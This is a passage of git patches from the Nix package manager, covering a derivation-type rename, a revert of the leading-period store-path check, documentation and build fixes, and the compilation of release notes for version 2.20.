a/src/libstore/derivations.hh b/src/libstore/derivations.hh index 2a326b578..522523e45 100644 --- a/src/libstore/derivations.hh +++ b/src/libstore/derivations.hh @@ -253,12 +253,17 @@ struct DerivationType { bool isSandboxed() const; /** - * Whether the derivation is expected to produce the same result - * every time, and therefore it only needs to be built once. This is - * only false for derivations that have the attribute '__impure = + * Whether the derivation is expected to produce a different result + * every time, and therefore it needs to be rebuilt every time. This is + * only true for derivations that have the attribute '__impure = * true'. + * + * Non-impure derivations can still behave impurely, to the degree permitted + * by the sandbox. Hence why this method isn't `isPure`: impure derivations + * are not the negation of pure derivations. Purity can not be ascertained + * except by rather heavy tools. */ - bool isPure() const; + bool isImpure() const; /** * Does the derivation knows its own output paths? From 6a99c18c304cd199950bf32d9b9cb07c0276f0b7 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Mon, 15 Jan 2024 08:18:53 +0100 Subject: [PATCH 353/654] doc/glossary: Define impure derivation --- doc/manual/src/glossary.md | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/doc/manual/src/glossary.md b/doc/manual/src/glossary.md index 4507d8bf3..46cc5926c 100644 --- a/doc/manual/src/glossary.md +++ b/doc/manual/src/glossary.md @@ -156,6 +156,11 @@ builder can rely on external inputs such as the network or the system time) but the Nix model assumes it. +- [impure derivation]{#gloss-impure-derivation} + + [An experimental feature](#@docroot@/contributing/experimental-features.md#xp-feature-impure-derivations) that allows derivations to be explicitly marked as impure, + so that they are always rebuilt, and their outputs not reused by subsequent calls to realise them. + - [Nix database]{#gloss-nix-database} An SQlite database to track [reference]s between [store object]s. From 9ddd0f2af8fd95e1380027a70d0aa650ea2fd5e4 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Sat, 27 Jan 2024 11:18:03 +0100 Subject: [PATCH 354/654] Revert "StorePath: reject names starting with '.'" This reverts commit 24bda0c7b381e1a017023c6f7cb9661fae8560bd. --- src/libstore/path-regex.hh | 2 +- src/libstore/path.cc | 2 -- tests/unit/libstore-support/tests/path.cc | 8 ++------ tests/unit/libstore/path.cc | 1 - 4 files changed, 3 insertions(+), 10 deletions(-) diff --git a/src/libstore/path-regex.hh b/src/libstore/path-regex.hh index a44e6a2eb..4f8dc4c1f 100644 --- a/src/libstore/path-regex.hh +++ b/src/libstore/path-regex.hh @@ -3,6 +3,6 @@ namespace nix { -static constexpr std::string_view nameRegexStr = R"([0-9a-zA-Z\+\-_\?=][0-9a-zA-Z\+\-\._\?=]*)"; +static constexpr std::string_view nameRegexStr = R"([0-9a-zA-Z\+\-\._\?=]+)"; } diff --git a/src/libstore/path.cc b/src/libstore/path.cc index a15a78545..4361b3194 100644 --- a/src/libstore/path.cc +++ b/src/libstore/path.cc @@ -9,8 +9,6 @@ static void checkName(std::string_view path, std::string_view name) if (name.size() > StorePath::MaxPathLen) throw BadStorePath("store path '%s' has a name longer than %d characters", path, StorePath::MaxPathLen); - if (name[0] == '.') - throw BadStorePath("store path '%s' starts with illegal character '.'", path); // See nameRegexStr for the definition for (auto c : name) if (!((c >= '0' && c <= '9') diff --git a/tests/unit/libstore-support/tests/path.cc b/tests/unit/libstore-support/tests/path.cc index e5f169e94..bbe43bad4 100644 --- a/tests/unit/libstore-support/tests/path.cc +++ b/tests/unit/libstore-support/tests/path.cc @@ -46,12 +46,8 @@ Gen Arbitrary::arbitrary() pre += '-'; break; case 64: - // names aren't permitted to start with a period, - // so just fall through to the next case here - if (c != 0) { - pre += '.'; - break; - } + pre += '.'; + break; case 65: pre += '_'; break; diff --git a/tests/unit/libstore/path.cc b/tests/unit/libstore/path.cc index 30631b5fd..5485ab8bb 100644 --- a/tests/unit/libstore/path.cc +++ b/tests/unit/libstore/path.cc @@ -39,7 +39,6 @@ TEST_DONT_PARSE(double_star, "**") TEST_DONT_PARSE(star_first, "*,foo") TEST_DONT_PARSE(star_second, "foo,*") TEST_DONT_PARSE(bang, "foo!o") -TEST_DONT_PARSE(dotfile, ".gitignore") #undef TEST_DONT_PARSE From 44a0d044832050cc419d844e73b8e021b0643357 Mon Sep 17 00:00:00 2001 From: Valentin Gagarin Date: Mon, 29 Jan 2024 05:56:19 +0100 Subject: [PATCH 355/654] add missing link (#9869) --- doc/manual/src/glossary.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/doc/manual/src/glossary.md b/doc/manual/src/glossary.md index 46cc5926c..13b2906f7 100644 --- a/doc/manual/src/glossary.md +++ b/doc/manual/src/glossary.md @@ -285,7 +285,7 @@ - [package attribute set]{#package-attribute-set} - An [attribute set] containing the attribute `type = "derivation";` (derivation for historical reasons), as well as other attributes, such as + An [attribute set](@docroot@/language/values.md#attribute-set) containing the attribute `type = "derivation";` (derivation for historical reasons), as well as other attributes, such as - attributes that refer to the files of a [package], typically in the form of [derivation outputs](#output), - attributes that declare something about how the package is supposed to be installed or used, - other metadata or arbitrary attributes. @@ -310,4 +310,4 @@ See the contribution guide on the [purpose and lifecycle of experimental feaures](@docroot@/contributing/experimental-features.md). -[Nix language]: ./language/index.md \ No newline at end of file +[Nix language]: ./language/index.md From f6719032cf7d867fe85da5916793d263670dbd8b Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Mon, 29 Jan 2024 15:22:44 +0100 Subject: [PATCH 356/654] Shut up a gcc warning --- tests/unit/libstore/serve-protocol.cc | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/tests/unit/libstore/serve-protocol.cc b/tests/unit/libstore/serve-protocol.cc index 597c0b570..b2fd0fb82 100644 --- a/tests/unit/libstore/serve-protocol.cc +++ b/tests/unit/libstore/serve-protocol.cc @@ -412,7 +412,7 @@ TEST_F(ServeProtoTest, handshake_log) toClient.create(); toServer.create(); - ServeProto::Version clientResult, serverResult; + ServeProto::Version clientResult; auto thread = std::thread([&]() { FdSink out { toServer.writeSide.get() }; @@ -425,7 +425,7 @@ TEST_F(ServeProtoTest, handshake_log) { FdSink out { toClient.writeSide.get() }; FdSource in { toServer.readSide.get() }; - serverResult = ServeProto::BasicServerConnection::handshake( + ServeProto::BasicServerConnection::handshake( out, in, defaultVersion); }; From baff34d728844870e62deea7847bbe1e97dfe157 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Mon, 29 Jan 2024 16:30:29 +0100 Subject: [PATCH 357/654] Don't include store docs in every manpage --- doc/manual/generate-manpage.nix | 5 +---- 1 file changed, 1 insertion(+), 4 deletions(-) diff --git a/doc/manual/generate-manpage.nix b/doc/manual/generate-manpage.nix index ae31b2a1f..ba5667a43 100644 --- a/doc/manual/generate-manpage.nix +++ b/doc/manual/generate-manpage.nix @@ -93,9 +93,6 @@ let maybeProse = # FIXME: this is a horrible hack to keep `nix help-stores` working. - # the correct answer to this is to remove that command and replace it - # by statically generated manpages or the output of something like `nix - # store info `. let help-stores = '' ${index} @@ -121,7 +118,7 @@ let }; in optionalString (details ? doc) ( - if match "@store-types@" details.doc != [ ] + if match ".*@store-types@.*" details.doc != null then help-stores else details.doc ); From 1ef6bbb16d61067bcfdd30f1c8910afe498cc164 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Mon, 29 Jan 2024 16:50:55 +0100 Subject: [PATCH 358/654] Update release-process.md --- maintainers/release-process.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/maintainers/release-process.md b/maintainers/release-process.md index db8b064a5..da6886ea9 100644 --- a/maintainers/release-process.md +++ b/maintainers/release-process.md @@ -27,8 +27,9 @@ release: * Compile the release notes by running ```console + $ export VERSION=X.YY $ git checkout -b release-notes - $ VERSION=X.YY ./maintainers/release-notes + $ ./maintainers/release-notes ``` where `X.YY` is *without* the patch level, e.g. `2.12` rather than ~~`2.12.0`~~. From 007040080977f1a06786fd4cfa7b4b95b18c5713 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Mon, 29 Jan 2024 17:10:42 +0100 Subject: [PATCH 359/654] maintainers/release-notes: Include changelog-d Otherwise it quietly generates an empty rl-.md --- doc/manual/src/contributing/hacking.md | 1 - flake.nix | 3 +-- maintainers/release-notes | 6 ++---- package.nix | 12 ------------ 4 files changed, 3 insertions(+), 19 deletions(-) diff --git a/doc/manual/src/contributing/hacking.md b/doc/manual/src/contributing/hacking.md index 9a7623dc9..9e2470859 100644 --- a/doc/manual/src/contributing/hacking.md +++ b/doc/manual/src/contributing/hacking.md @@ -304,7 +304,6 @@ See also the [format documentation](https://github.com/haskell/cabal/blob/master ### Build process Releases have a precomputed `rl-MAJOR.MINOR.md`, and no `rl-next.md`. -Set `buildUnreleasedNotes = true;` in `flake.nix` to build the release notes on the fly. ## Branches diff --git a/flake.nix b/flake.nix index a48e36a2f..0bc70768e 100644 --- a/flake.nix +++ b/flake.nix @@ -190,7 +190,6 @@ boehmgc = final.boehmgc-nix; libgit2 = final.libgit2-nix; busybox-sandbox-shell = final.busybox-sandbox-shell or final.default-busybox-sandbox-shell; - changelog-d = final.changelog-d-nix; } // { # this is a proper separate downstream package, but put # here also for back compat reasons. @@ -363,7 +362,7 @@ }); packages = forAllSystems (system: rec { - inherit (nixpkgsFor.${system}.native) nix; + inherit (nixpkgsFor.${system}.native) nix changelog-d-nix; default = nix; } // (lib.optionalAttrs (builtins.elem system linux64BitSystems) { nix-static = nixpkgsFor.${system}.static.nix; diff --git a/maintainers/release-notes b/maintainers/release-notes index 34cd85a56..2d84485c1 100755 --- a/maintainers/release-notes +++ b/maintainers/release-notes @@ -1,7 +1,5 @@ -#!/usr/bin/env nix-shell -#!nix-shell -i bash ../shell.nix -I nixpkgs=channel:nixos-unstable-small -# ^^^^^^^ -# Only used for bash. shell.nix goes to the flake. +#!/usr/bin/env nix +#!nix shell .#changelog-d-nix --command bash # --- CONFIGURATION --- diff --git a/package.nix b/package.nix index 192df90ab..d1d14d10e 100644 --- a/package.nix +++ b/package.nix @@ -10,7 +10,6 @@ , boost , brotli , bzip2 -, changelog-d , curl , editline , readline @@ -88,11 +87,6 @@ # - readline , readlineFlavor ? if stdenv.hostPlatform.isWindows then "readline" else "editline" -# Whether to compile `rl-next.md`, the release notes for the next -# not-yet-released version of Nix in the manul, from the individual -# change log entries in the directory. -, buildUnreleasedNotes ? false - # Whether to build the internal API docs, can be done separately from # everything else. , enableInternalAPIDocs ? false @@ -218,9 +212,6 @@ in { ] ++ lib.optionals (doInstallCheck || enableManual) [ jq # Also for custom mdBook preprocessor. ] ++ lib.optional stdenv.hostPlatform.isLinux util-linux - # Official releases don't have rl-next, so we don't need to compile a - # changelog - ++ lib.optional (!officialRelease && buildUnreleasedNotes) changelog-d ++ lib.optional enableInternalAPIDocs doxygen ; @@ -378,9 +369,6 @@ in { # Nix proper (which they depend on). (installUnitTests -> doBuild) (doCheck -> doBuild) - # We have to build the manual to build unreleased notes, as those - # are part of the manual - (buildUnreleasedNotes -> enableManual) # The build process for the manual currently requires extracting # data from the Nix executable we are trying to document. (enableManual -> doBuild) From 3089bce41b020fafd3e31034cf9f5dcf33a0b65c Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Mon, 29 Jan 2024 17:14:17 +0100 Subject: [PATCH 360/654] release notes: 2.20.0 --- ...llowed-uris-can-now-match-whole-schemes.md | 7 - doc/manual/rl-next/cgroup-stats.md | 8 - doc/manual/rl-next/drv-string-parse-hang.md | 6 - doc/manual/rl-next/empty-search-regex.md | 8 - doc/manual/rl-next/env-size-reduction.md | 7 - doc/manual/rl-next/eval-system.md | 12 - doc/manual/rl-next/git-fetcher.md | 18 - doc/manual/rl-next/hash-format-nix32.md | 23 -- doc/manual/rl-next/ifd-eval-store.md | 8 - doc/manual/rl-next/mounted-ssh-store.md | 8 - doc/manual/rl-next/nix-config-show.md | 7 - doc/manual/rl-next/nix-env-json-drv-path.md | 6 - .../rl-next/nix-flake-check-logs-actions.md | 33 -- doc/manual/rl-next/nix-hash-convert.md | 47 --- doc/manual/rl-next/nix-profile-names.md | 8 - doc/manual/rl-next/nix-store-add.md | 7 - .../rl-next/print-value-in-coercion-error.md | 24 -- .../rl-next/print-value-in-type-error.md | 23 -- .../rl-next/source-positions-in-errors.md | 42 --- .../rl-next/stack-overflow-segfaults.md | 32 -- doc/manual/rl-next/with-error-reporting.md | 31 -- doc/manual/src/SUMMARY.md.in | 1 + doc/manual/src/release-notes/rl-2.20.md | 334 ++++++++++++++++++ 23 files changed, 335 insertions(+), 365 deletions(-) delete mode 100644 doc/manual/rl-next/allowed-uris-can-now-match-whole-schemes.md delete mode 100644 doc/manual/rl-next/cgroup-stats.md delete mode 100644 doc/manual/rl-next/drv-string-parse-hang.md delete mode 100644 doc/manual/rl-next/empty-search-regex.md delete mode 100644 doc/manual/rl-next/env-size-reduction.md delete mode 100644 doc/manual/rl-next/eval-system.md delete mode 100644 doc/manual/rl-next/git-fetcher.md delete mode 100644 doc/manual/rl-next/hash-format-nix32.md delete mode 100644 doc/manual/rl-next/ifd-eval-store.md delete mode 100644 doc/manual/rl-next/mounted-ssh-store.md delete mode 100644 doc/manual/rl-next/nix-config-show.md delete mode 100644 doc/manual/rl-next/nix-env-json-drv-path.md delete mode 100644 doc/manual/rl-next/nix-flake-check-logs-actions.md delete mode 100644 doc/manual/rl-next/nix-hash-convert.md delete mode 100644 doc/manual/rl-next/nix-profile-names.md delete mode 100644 doc/manual/rl-next/nix-store-add.md delete mode 100644 doc/manual/rl-next/print-value-in-coercion-error.md delete mode 100644 doc/manual/rl-next/print-value-in-type-error.md delete mode 100644 doc/manual/rl-next/source-positions-in-errors.md delete mode 100644 doc/manual/rl-next/stack-overflow-segfaults.md delete mode 100644 doc/manual/rl-next/with-error-reporting.md create mode 100644 doc/manual/src/release-notes/rl-2.20.md diff --git a/doc/manual/rl-next/allowed-uris-can-now-match-whole-schemes.md b/doc/manual/rl-next/allowed-uris-can-now-match-whole-schemes.md deleted file mode 100644 index 3cf75a612..000000000 --- a/doc/manual/rl-next/allowed-uris-can-now-match-whole-schemes.md +++ /dev/null @@ -1,7 +0,0 @@ ---- -synopsis: Option `allowed-uris` can now match whole schemes in URIs without slashes -prs: 9547 ---- - -If a scheme, such as `github:` is specified in the `allowed-uris` option, all URIs starting with `github:` are allowed. -Previously this only worked for schemes whose URIs used the `://` syntax. diff --git a/doc/manual/rl-next/cgroup-stats.md b/doc/manual/rl-next/cgroup-stats.md deleted file mode 100644 index 00853a0f8..000000000 --- a/doc/manual/rl-next/cgroup-stats.md +++ /dev/null @@ -1,8 +0,0 @@ ---- -synopsis: Include cgroup stats when building through the daemon -prs: 9598 ---- - -Nix now also reports cgroup statistics when building through the nix daemon and when doing remote builds using ssh-ng, -if both sides of the connection are this version of Nix or newer. - diff --git a/doc/manual/rl-next/drv-string-parse-hang.md b/doc/manual/rl-next/drv-string-parse-hang.md deleted file mode 100644 index 1e041d3e9..000000000 --- a/doc/manual/rl-next/drv-string-parse-hang.md +++ /dev/null @@ -1,6 +0,0 @@ ---- -synopsis: Fix handling of truncated `.drv` files. -prs: 9673 ---- - -Previously a `.drv` that was truncated in the middle of a string would case nix to enter an infinite loop, eventually exhausting all memory and crashing. diff --git a/doc/manual/rl-next/empty-search-regex.md b/doc/manual/rl-next/empty-search-regex.md deleted file mode 100644 index b193f9456..000000000 --- a/doc/manual/rl-next/empty-search-regex.md +++ /dev/null @@ -1,8 +0,0 @@ -synopsis: Disallow empty search regex in `nix search` -prs: #9481 -description: { - -[`nix search`](@docroot@/command-ref/new-cli/nix3-search.md) now requires a search regex to be passed. To show all packages, use `^`. - -} - diff --git a/doc/manual/rl-next/env-size-reduction.md b/doc/manual/rl-next/env-size-reduction.md deleted file mode 100644 index 40a58bc28..000000000 --- a/doc/manual/rl-next/env-size-reduction.md +++ /dev/null @@ -1,7 +0,0 @@ ---- -synopsis: Reduce eval memory usage and wall time -prs: 9658 ---- - -Reduce the size of the `Env` struct used in the evaluator by a pointer, or 8 bytes on most modern machines. -This reduces memory usage during eval by around 2% and wall time by around 3%. diff --git a/doc/manual/rl-next/eval-system.md b/doc/manual/rl-next/eval-system.md deleted file mode 100644 index a4696a56c..000000000 --- a/doc/manual/rl-next/eval-system.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -synopsis: Add new `eval-system` setting -prs: 4093 ---- - -Add a new `eval-system` option. -Unlike `system`, it just overrides the value of `builtins.currentSystem`. -This is more useful than overriding `system`, because you can build these derivations on remote builders which can work on the given system. -In contrast, `system` also effects scheduling which will cause Nix to build those derivations locally even if that doesn't make sense. - -`eval-system` only takes effect if it is non-empty. -If empty (the default) `system` is used as before, so there is no breakage. diff --git a/doc/manual/rl-next/git-fetcher.md b/doc/manual/rl-next/git-fetcher.md deleted file mode 100644 index 54c0d216d..000000000 --- a/doc/manual/rl-next/git-fetcher.md +++ /dev/null @@ -1,18 +0,0 @@ ---- -synopsis: "Nix now uses `libgit2` for Git fetching" -prs: - - 9240 - - 9241 - - 9258 - - 9480 -issues: - - 5313 ---- - -Nix has built-in support for fetching sources from Git, during evaluation and locking; outside the sandbox. -The existing implementation based on the Git CLI had issues regarding reproducibility and performance. - -Most of the original `fetchGit` behavior has been implemented using the `libgit2` library, which gives the fetcher fine-grained control. - -Known issues: -- The `export-subst` behavior has not been reimplemented. [Partial](https://github.com/NixOS/nix/pull/9391#issuecomment-1872503447) support for this Git feature is feasible, but it did not make the release window. diff --git a/doc/manual/rl-next/hash-format-nix32.md b/doc/manual/rl-next/hash-format-nix32.md deleted file mode 100644 index 73e6fbb24..000000000 --- a/doc/manual/rl-next/hash-format-nix32.md +++ /dev/null @@ -1,23 +0,0 @@ ---- -synopsis: Rename hash format `base32` to `nix32` -prs: 9452 ---- - -Hash format `base32` was renamed to `nix32` since it used a special nix-specific character set for -[Base32](https://en.wikipedia.org/wiki/Base32). - -## Deprecation: Use `nix32` instead of `base32` as `toHashFormat` - -For the builtin `convertHash`, the `toHashFormat` parameter now accepts the same hash formats as the `--to`/`--from` -parameters of the `nix hash conert` command: `"base16"`, `"nix32"`, `"base64"`, and `"sri"`. The former `"base32"` value -remains as a deprecated alias for `"base32"`. Please convert your code from: - -```nix -builtins.convertHash { inherit hash hashAlgo; toHashFormat = "base32";} -``` - -to - -```nix -builtins.convertHash { inherit hash hashAlgo; toHashFormat = "nix32";} -``` \ No newline at end of file diff --git a/doc/manual/rl-next/ifd-eval-store.md b/doc/manual/rl-next/ifd-eval-store.md deleted file mode 100644 index 835e7e7a3..000000000 --- a/doc/manual/rl-next/ifd-eval-store.md +++ /dev/null @@ -1,8 +0,0 @@ ---- -synopsis: import-from-derivation builds the derivation in the build store -prs: 9661 ---- - -When using `--eval-store`, `import`ing from a derivation will now result in the derivation being built on the build store, i.e. the store specified in the `store` Nix option. - -Because the resulting Nix expression must be copied back to the eval store in order to be imported, this requires the eval store to trust the build store's signatures. diff --git a/doc/manual/rl-next/mounted-ssh-store.md b/doc/manual/rl-next/mounted-ssh-store.md deleted file mode 100644 index 6df44dbb6..000000000 --- a/doc/manual/rl-next/mounted-ssh-store.md +++ /dev/null @@ -1,8 +0,0 @@ ---- -synopsis: Mounted SSH Store -issues: 7890 -prs: 7912 ---- - -Introduced the store [`mounted-ssh-ng://`](@docroot@/command-ref/new-cli/nix3-help-stores.md). -This store allows full access to a Nix store on a remote machine and additionally requires that the store be mounted in the local filesystem. diff --git a/doc/manual/rl-next/nix-config-show.md b/doc/manual/rl-next/nix-config-show.md deleted file mode 100644 index 26b961b76..000000000 --- a/doc/manual/rl-next/nix-config-show.md +++ /dev/null @@ -1,7 +0,0 @@ ---- -synopsis: Rename to `nix config show` -issues: 7672 -prs: 9477 ---- - -`nix show-config` was renamed to `nix config show`, and `nix doctor` was renamed to `nix config check`, to be more consistent with the rest of the command-line interface. diff --git a/doc/manual/rl-next/nix-env-json-drv-path.md b/doc/manual/rl-next/nix-env-json-drv-path.md deleted file mode 100644 index 734cefd1b..000000000 --- a/doc/manual/rl-next/nix-env-json-drv-path.md +++ /dev/null @@ -1,6 +0,0 @@ ---- -synopsis: Fix `nix-env --query --drv-path --json` -prs: 9257 ---- - -Fixed a bug where `nix-env --query` ignored `--drv-path` when `--json` was set. diff --git a/doc/manual/rl-next/nix-flake-check-logs-actions.md b/doc/manual/rl-next/nix-flake-check-logs-actions.md deleted file mode 100644 index 53a7b35eb..000000000 --- a/doc/manual/rl-next/nix-flake-check-logs-actions.md +++ /dev/null @@ -1,33 +0,0 @@ ---- -synopsis: Some stack overflow segfaults are fixed -issues: 8882 -prs: 8893 ---- - -`nix flake check` now logs the checks it runs and the derivations it evaluates: - -``` -$ nix flake check -v -evaluating flake... -checking flake output 'checks'... -checking derivation 'checks.aarch64-darwin.ghciwatch-tests'... -derivation evaluated to /nix/store/nh7dlvsrhds4cxl91mvgj4h5cbq6skmq-ghciwatch-test-0.3.0.drv -checking derivation 'checks.aarch64-darwin.ghciwatch-clippy'... -derivation evaluated to /nix/store/9cb5a6wmp6kf6hidqw9wphidvb8bshym-ghciwatch-clippy-0.3.0.drv -checking derivation 'checks.aarch64-darwin.ghciwatch-doc'... -derivation evaluated to /nix/store/8brdd3jbawfszpbs7vdpsrhy80as1il8-ghciwatch-doc-0.3.0.drv -checking derivation 'checks.aarch64-darwin.ghciwatch-fmt'... -derivation evaluated to /nix/store/wjhs0l1njl5pyji53xlmfjrlya0wmz8p-ghciwatch-fmt-0.3.0.drv -checking derivation 'checks.aarch64-darwin.ghciwatch-audit'... -derivation evaluated to /nix/store/z0mps8dyj2ds7c0fn0819y5h5611033z-ghciwatch-audit-0.3.0.drv -checking flake output 'packages'... -checking derivation 'packages.aarch64-darwin.default'... -derivation evaluated to /nix/store/41abbdyglw5x9vcsvd89xan3ydjf8d7r-ghciwatch-0.3.0.drv -checking flake output 'apps'... -checking flake output 'devShells'... -checking derivation 'devShells.aarch64-darwin.default'... -derivation evaluated to /nix/store/bc935gz7dylzmcpdb5cczr8gngv8pmdb-nix-shell.drv -running 5 flake checks... -warning: The check omitted these incompatible systems: aarch64-linux, x86_64-darwin, x86_64-linux -Use '--all-systems' to check all. -``` diff --git a/doc/manual/rl-next/nix-hash-convert.md b/doc/manual/rl-next/nix-hash-convert.md deleted file mode 100644 index 69db9508a..000000000 --- a/doc/manual/rl-next/nix-hash-convert.md +++ /dev/null @@ -1,47 +0,0 @@ ---- -synopsis: Add `nix hash convert` -prs: 9452 ---- - -New [`nix hash convert`](https://github.com/NixOS/nix/issues/8876) sub command with a fast track -to stabilization! Examples: - -- Convert the hash to `nix32`. - - ```bash - $ nix hash convert --hash-algo "sha1" --to nix32 "800d59cfcd3c05e900cb4e214be48f6b886a08df" - vw46m23bizj4n8afrc0fj19wrp7mj3c0 - ``` - `nix32` is a base32 encoding with a nix-specific character set. - Explicitly specify the hashing algorithm (optional with SRI hashes) but detect hash format by the length of the input - hash. -- Convert the hash to the `sri` format that includes an algorithm specification: - ```bash - nix hash convert --hash-algo "sha1" "800d59cfcd3c05e900cb4e214be48f6b886a08df" - sha1-gA1Zz808BekAy04hS+SPa4hqCN8= - ``` - or with an explicit `-to` format: - ```bash - nix hash convert --hash-algo "sha1" --to sri "800d59cfcd3c05e900cb4e214be48f6b886a08df" - sha1-gA1Zz808BekAy04hS+SPa4hqCN8= - ``` -- Assert the input format of the hash: - ```bash - nix hash convert --hash-algo "sha256" --from nix32 "ungWv48Bz+pBQUDeXa4iI7ADYaOWF3qctBD/YfIAFa0=" - error: input hash 'ungWv48Bz+pBQUDeXa4iI7ADYaOWF3qctBD/YfIAFa0=' does not have the expected format '--from nix32' - nix hash convert --hash-algo "sha256" --from nix32 "1b8m03r63zqhnjf7l5wnldhh7c134ap5vpj0850ymkq1iyzicy5s" - sha256-ungWv48Bz+pBQUDeXa4iI7ADYaOWF3qctBD/YfIAFa0= - ``` - -The `--to`/`--from`/`--hash-algo` parameters have context-sensitive auto-completion. - -## Related Deprecations - -The following commands are still available but will emit a deprecation warning. Please convert your code to -`nix hash convert`: - -- `nix hash to-base16 $hash1 $hash2`: Use `nix hash convert --to base16 $hash1 $hash2` instead. -- `nix hash to-base32 $hash1 $hash2`: Use `nix hash convert --to nix32 $hash1 $hash2` instead. -- `nix hash to-base64 $hash1 $hash2`: Use `nix hash convert --to base64 $hash1 $hash2` instead. -- `nix hash to-sri $hash1 $hash2`: : Use `nix hash convert --to sri $hash1 $hash2` - or even just `nix hash convert $hash1 $hash2` instead. diff --git a/doc/manual/rl-next/nix-profile-names.md b/doc/manual/rl-next/nix-profile-names.md deleted file mode 100644 index b7ad4b5d7..000000000 --- a/doc/manual/rl-next/nix-profile-names.md +++ /dev/null @@ -1,8 +0,0 @@ ---- -synopsis: "`nix profile` now allows referring to elements by human-readable name" -prs: 8678 ---- - -[`nix profile`](@docroot@/command-ref/new-cli/nix3-profile.md) now uses names to refer to installed packages when running [`list`](@docroot@/command-ref/new-cli/nix3-profile-list.md), [`remove`](@docroot@/command-ref/new-cli/nix3-profile-remove.md) or [`upgrade`](@docroot@/command-ref/new-cli/nix3-profile-upgrade.md) as opposed to indices. Profile element names are generated when a package is installed and remain the same until the package is removed. - -**Warning**: The `manifest.nix` file used to record the contents of profiles has changed. Nix will automatically upgrade profiles to the new version when you modify the profile. After that, the profile can no longer be used by older versions of Nix. diff --git a/doc/manual/rl-next/nix-store-add.md b/doc/manual/rl-next/nix-store-add.md deleted file mode 100644 index 5ef2913b4..000000000 --- a/doc/manual/rl-next/nix-store-add.md +++ /dev/null @@ -1,7 +0,0 @@ ---- -synopsis: Give `nix store add` a `--hash-algo` flag -prs: 9809 ---- - -Adds a missing feature that was present in the old CLI, and matches our -plans to have similar flags for `nix hash convert` and `nix hash path`. diff --git a/doc/manual/rl-next/print-value-in-coercion-error.md b/doc/manual/rl-next/print-value-in-coercion-error.md deleted file mode 100644 index 046e4e3cf..000000000 --- a/doc/manual/rl-next/print-value-in-coercion-error.md +++ /dev/null @@ -1,24 +0,0 @@ ---- -synopsis: Coercion errors include the failing value -issues: #561 -prs: #9754 ---- - -The `error: cannot coerce a to a string` message now includes the value -which caused the error. - -Before: - -``` - error: cannot coerce a set to a string -``` - -After: - -``` - error: cannot coerce a set to a string: { aesSupport = «thunk»; - avx2Support = «thunk»; avx512Support = «thunk»; avxSupport = «thunk»; - canExecute = «thunk»; config = «thunk»; darwinArch = «thunk»; darwinMinVersion - = «thunk»; darwinMinVersionVariable = «thunk»; darwinPlatform = «thunk»; «84 - attributes elided»} -``` diff --git a/doc/manual/rl-next/print-value-in-type-error.md b/doc/manual/rl-next/print-value-in-type-error.md deleted file mode 100644 index aaae22756..000000000 --- a/doc/manual/rl-next/print-value-in-type-error.md +++ /dev/null @@ -1,23 +0,0 @@ ---- -synopsis: Type errors include the failing value -issues: #561 -prs: #9753 ---- - -In errors like `value is an integer while a list was expected`, the message now -includes the failing value. - -Before: - -``` - error: value is a set while a string was expected -``` - -After: - -``` - error: expected a string but found a set: { ghc810 = «thunk»; - ghc8102Binary = «thunk»; ghc8107 = «thunk»; ghc8107Binary = «thunk»; - ghc865Binary = «thunk»; ghc90 = «thunk»; ghc902 = «thunk»; ghc92 = «thunk»; - ghc924Binary = «thunk»; ghc925 = «thunk»; «17 attributes elided»} -``` diff --git a/doc/manual/rl-next/source-positions-in-errors.md b/doc/manual/rl-next/source-positions-in-errors.md deleted file mode 100644 index b1a33d83b..000000000 --- a/doc/manual/rl-next/source-positions-in-errors.md +++ /dev/null @@ -1,42 +0,0 @@ ---- -synopsis: Source locations are printed more consistently in errors -issues: 561 -prs: 9555 ---- - -Source location information is now included in error messages more -consistently. Given this code: - -```nix -let - attr = {foo = "bar";}; - key = {}; -in - attr.${key} -``` - -Previously, Nix would show this unhelpful message when attempting to evaluate -it: - -``` -error: - … while evaluating an attribute name - - error: value is a set while a string was expected -``` - -Now, the error message displays where the problematic value was found: - -``` -error: - … while evaluating an attribute name - - at bad.nix:4:11: - - 3| key = {}; - 4| in attr.${key} - | ^ - 5| - - error: expected a string but found a set -``` diff --git a/doc/manual/rl-next/stack-overflow-segfaults.md b/doc/manual/rl-next/stack-overflow-segfaults.md deleted file mode 100644 index 3d9753248..000000000 --- a/doc/manual/rl-next/stack-overflow-segfaults.md +++ /dev/null @@ -1,32 +0,0 @@ ---- -synopsis: Some stack overflow segfaults are fixed -issues: 9616 -prs: 9617 ---- - -The number of nested function calls has been restricted, to detect and report -infinite function call recursions. The default maximum call depth is 10,000 and -can be set with [the `max-call-depth` -option](@docroot@/command-ref/conf-file.md#conf-max-call-depth). - -This fixes segfaults or the following unhelpful error message in many cases: - - error: stack overflow (possible infinite recursion) - -Before: - -``` -$ nix-instantiate --eval --expr '(x: x x) (x: x x)' -Segmentation fault: 11 -``` - -After: - -``` -$ nix-instantiate --eval --expr '(x: x x) (x: x x)' -error: stack overflow - - at «string»:1:14: - 1| (x: x x) (x: x x) - | ^ -``` diff --git a/doc/manual/rl-next/with-error-reporting.md b/doc/manual/rl-next/with-error-reporting.md deleted file mode 100644 index d9e07df52..000000000 --- a/doc/manual/rl-next/with-error-reporting.md +++ /dev/null @@ -1,31 +0,0 @@ ---- -synopsis: Better error reporting for `with` expressions -prs: 9658 ---- - -`with` expressions using non-attrset values to resolve variables are now reported with proper positions. - -Previously an incorrect `with` expression would report no position at all, making it hard to determine where the error originated: - -``` -nix-repl> with 1; a -error: - … - - at «none»:0: (source not available) - - error: value is an integer while a set was expected -``` - -Now position information is preserved and reported as with most other errors: - -``` -nix-repl> with 1; a -error: - … while evaluating the first subexpression of a with expression - at «string»:1:1: - 1| with 1; a - | ^ - - error: expected a set but found an integer -``` diff --git a/doc/manual/src/SUMMARY.md.in b/doc/manual/src/SUMMARY.md.in index 10fe51fc9..695d63dfc 100644 --- a/doc/manual/src/SUMMARY.md.in +++ b/doc/manual/src/SUMMARY.md.in @@ 